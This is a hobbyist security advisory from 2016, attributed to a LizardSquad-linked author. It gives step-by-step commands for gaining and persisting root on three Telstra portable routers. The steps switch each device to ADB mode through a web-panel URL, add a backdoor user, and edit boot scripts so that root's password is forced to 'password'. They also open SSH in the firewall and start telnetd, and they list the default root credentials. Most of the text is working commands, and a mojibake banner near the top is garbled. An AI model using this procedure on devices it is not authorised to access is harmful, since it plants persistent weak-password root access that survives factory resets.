This write up discusses how to leave a persistent root shell on a Telstra 4GX portable router.
7a80dcc21f0f695423e49bcf2557195fb27939c236ec9f1533baea601f1ac355
Majority of this info was found from the 4dpa.ru forum but works well
on Telstra Mobile routers.
Telstra has been contacted and do not see it as a security issue so
have fun messing with your 4g routers, not much of a security issue
but if you find it useful i had a boring afternoon and took a look.
Also just managed to grab my lizardsquad.ru domain back so figured
what a fun way to release security vulnerabilities.
Please excuse the poor explaination as this is the first time I've wrote one of this.
Author of advisory: David Crees ak/a abdilo
Email: admin@aussi.es
Twitter: @abdilo__
Website link to advisory: https://lizardsquad.ru/index.html
Discovery Date: Sep 30th, 2016
All devices have default credentials of: root:oelinux123 if you want
to skip adding user and changing root password steps I'm sure if
anyone put more then 12 hours of effort into this it would work well.
------------------------------------------------------------
Vulnerable Portable Wi-Fi Router #1:
Device: Pre-Paid Telstra 4GX Portable WI-FI Router
Model: ZTE MF910V
ISP: Telstra
Uname -a: Linux mdm9625 3.4.0+ #1 PREEMPT Mon Oct 26 21:47:30 CST 2015 armv7l GNU/Linux
Link: http://www.ztemobiles.com.au/MF910B.htm
------------------------------------------------------------
Thanks:
http://4pda.ru/
Without 4pda.ru this would of taken days and not a few hours, hats off to you guys even though i can't gain an account(cant type russian captcha) on your site, it was very useful.
------------------------------------------------------------
D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a
D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a
D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a
D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/a
D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/a D2aC/ND2aa!D2aa!D2aa!D2aa!D2aC/a
D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/N
Step #1 ------------------------------------------------------------
Plug your Telstra 4GX Router into a usb 2.0 slot on your current computer.
Open up cmd.exe:
cmd.exe > adb start-server
cmd.exe > adb devices
(Starts ADB)
Step #2 ------------------------------------------------------------
Login to http://192.168.0.1/ with default factory new password "password"
Once logged on go to:
http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=6
(Device is now in ADB mode)
Step #3 ------------------------------------------------------------
Go back to cmd.exe and execute these commands:
C:\> adb devices
List of devices attached
PXXXXXXXXD000000 device (Your Telstra Hotspot Device Should Apear Here, if it did not then retry beginning steps or wait for drivers to install)
C:\> adb shell
/ #
(You now have a root adb shell)
Step #4 ------------------------------------------------------------
Add new user from adb root shell:
mdm9625:~# adduser -s /bin/sh -S newuser
mdm9625:~# passwd newuser (enter "newuser")
(The user newuser@192.168.0.1 has been created)
Step #5 ------------------------------------------------------------
Remove old ip tables rulings to get ssh back temporarily:
/ # iptables -t filter -I INPUT -p tcp --dport 22 -j ACCEPT
/ # iptables -t filter -I INPUT -p udp --dport 22 -j ACCEPT
(SSH is now re-enabled)
Step #6 ------------------------------------------------------------
Edit /usr/zte/zte_conf/scripts/firewall_init.sh with vi.
Add a "#" infront of lines 92 and 93 as seen below (press the insert key to start typing, once typed CTRL+C, then type :wq, and press enter):
#iptables -t filter -I INPUT -p tcp --dport 22 -j DROP
#iptables -t filter -I INPUT -p udp --dport 22 -j DROP
(This will stop firewall_init.sh from disabling ssh on reboots and factory resets)
Step #7 --------------------------------------------------------
Append the following to the bottom of firewall_init.sh using vi(same steps for using vi as above):
echo "password
password
"|passwd
(This will change the root user's password at boot to "password", if you do not do this when you reboot the device the root password will change)
Step #8 ------------------------------------------------------------
Reboot the device.
(This will now disable ADB mode and the device will start normally)
Step #9 ------------------------------------------------------------
Connect to the Telstra 4GX Router's wifi signal.
Step #10------------------------------------------------------------
Now SSH into the Router:
Open PuTTY.exe
Enter "192.168.0.1" into "Host Name or IP Address" and click "Open".
(A new window will apear follow directions bellow)
login as: newuser
newuser@192.168.0.1's password: (enter the password "newuser")
mdm9625:~$ whoami
newuser
mdm9625:~$ su
Password: (enter the word "password")
mdm9625:/# whoami
root
mdm9625:/# uname -a
Linux mdm9625 3.4.0+ #1 PREEMPT Mon Oct 26 21:47:30 CST 2015 armv7l GNU/Linux
mdm9625:/# id
uid=0(root) gid=0(root) groups=0(root)
mdm9625:/#
(Alternatively you can login as the root user directly instead of going through this extra step)
Step #11------------------------------------------------------------
Enjoy your persistent root shell.
You can even restore device to factory settings via the webpanel or by pressing the button on the device and your shell account still stays persistent with ssh enabled and root's password stuck set as "password".
------------------------------------------------------------
------------------------------------------------------------
-------------------Bonus Part 2:----------------------------
------------------------------------------------------------
------------------------------------------------------------
Device: Pre-Paid Telstra My Pocket Wi-Fi 3G Lite
Model: ZTE MF90
ISP: Telstra
Link: http://www.ztemobiles.com.au/MF90.htm
Step #1 ------------------------------------------------------------
Plug your Telstra 3G Router into a usb 2.0 slot on your current computer.
Open up cmd.exe:
cmd.exe > adb start-server
cmd.exe > adb devices
(Starts ADB)
Step #2 ------------------------------------------------------------
Login to http://192.168.0.1/ with default factory new password "password"
Once logged on go to:
http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=6
(Device is now in ADB mode)
Step #3 ------------------------------------------------------------
Go back to cmd.exe and execute these commands:
C:\> adb devices
List of devices attached
PXXXXXXXXD000000 device (Your Telstra Hotspot Device Should Apear Here, if it did not then retry beginning steps or wait for drivers to install)
C:\> adb shell
/ #
(You now have a root adb shell)
Step #4 ------------------------------------------------------------
Add new user from adb root shell:
mdm9625:~# adduser -s /bin/sh -S newuser
mdm9625:~# passwd newuser (enter "newuser")
(The user newuser@192.168.0.1 has been created)
Step #5 ------------------------------------------------------------
Edit /usr/zte/zte_conf/scripts/firewall_filter_init.sh with vi.
Enter the below text at the bottom of the script:
echo "password
password
"|passwd
telnetd -F -p 23 &
echo "firewall init done"
#nat.sh
(This is guarentee admin password is password and enables telnet)
------------------------------------
Open with vi /usr/zte/zte_conf/scripts/firewall_init.sh
Enter the below text above the (echo "firewall init done") line.
iptables -t filter -I INPUT -p tcp --dport 23 -j ACCEPT
iptables -t filter -I INPUT -p udp --dport 23 -j ACCEPT
iptables -t filter -I OUTPUT -p udp --dport 23 -j ACCEPT
iptables -t filter -I OUTPUT -p tcp --dport 23 -j ACCEPT
echo "firewall init done"
#nat.sh
(This allows telnet through the firewall)
-----------------------------------------------------
Reboot it
Voila
------------------------------------------------------------
------------------------------------------------------------
-------------------Bonus Part 3:----------------------------
------------------------------------------------------------
------------------------------------------------------------
After realizing how easy it was to root the past two i went out and purchased the brand new Telstra 4GX Advanced III with AirCard Smart Cradle Model DC112A and the Telstra 4GX Advanced II both outright to avoid Telstra claiming i damaged their goods.(Havn't had success with the Telstra 4GX Advanced II yet ak/a NetGear AirCard 790s).
Vulnerable Portable Wi-Fi Router:
Device: Telstra 4GX Advanced III
Model: Netgear AirCard 810S Mobile Hotspot
ISP: Telstra
Uname -a: Linux mdm9640 3.10.49-svn2309 #1 PREEMPT Thu Sep 3 14:53:22 PDT 2015 armv7l GNU/Linux
Link: http://www.netgear.com.au/home/products/mobile-broadband/hotspots/AC810S.aspx?cid=wmt_netgear_organic
Step #1 ------------------------------------------------------------
Plug your Telstra 4GX Router into a usb 2.0 slot on your current computer.
Open up cmd.exe:
cmd.exe > adb start-server
cmd.exe > adb connect 192.168.1.1
cmd.exe > adb shell
(This will spawn a root shell)
---------------------------
Edit /etc/mdev/ntgr-setupinput.sh with vi and enter the bellow text as follows:
Add "telnetd-F -p23 &" underneath # NTGRSTART and above MDEV.
Save the file
------------------------------
File should look like:
#!/bin/sh
# NTGRSTART
telnetd -F -p 23 &
MDEV=`echo $MDEV | sed 's#input/##g'`
# Detect touchscreen MSG2133 - driver provides following:
# b0018 - bus I2C
# v1B20 - MStar Semiconductor USB vendor ID
# p2133 - product ID (made up from model name)
# Our driver writes these (exccept bus) to input ID strucutre
if [ `egrep "input:b0018v1B20p2133*" /sys/class/input/$MDEV/device/modalias|wc -l` -gt 0 ]; then
ln -sf /dev/input/$MDEV /dev/input/touchscreen0
fi
# Detect power key
if [ `egrep "input:.*-e0.*,.*k74,.*" /sys/class/input/$MDEV/device/modalias|wc -l` -gt 0 ]; then
ln -sf /dev/input/$MDEV /dev/input/pwr_key0
fi
# Detect touchscreen/button CY8CMBR3108 - driver provides following:
# b0018 - bus I2C
# v04B4 - Cypress USB vendor ID
# p3108 - product ID (made up from model name)
# Our driver writes these (exccept bus) to input ID strucutre
if [ `egrep "input:b0018v04B4p3108*" /sys/class/input/$MDEV/device/modalias|wc -l` -gt 0 ]; then
ln -sf /dev/input/$MDEV /dev/input/touchscreen0
fi
# NTGRSTOP
------------------------
reboot the device
-----------------------
login via telnet with:
root:oelinux123
Voila you now have root access
----------------------------------------------------------------------------------------------------------------------
The 16-year-old only has to be right once. You have to be right all the time.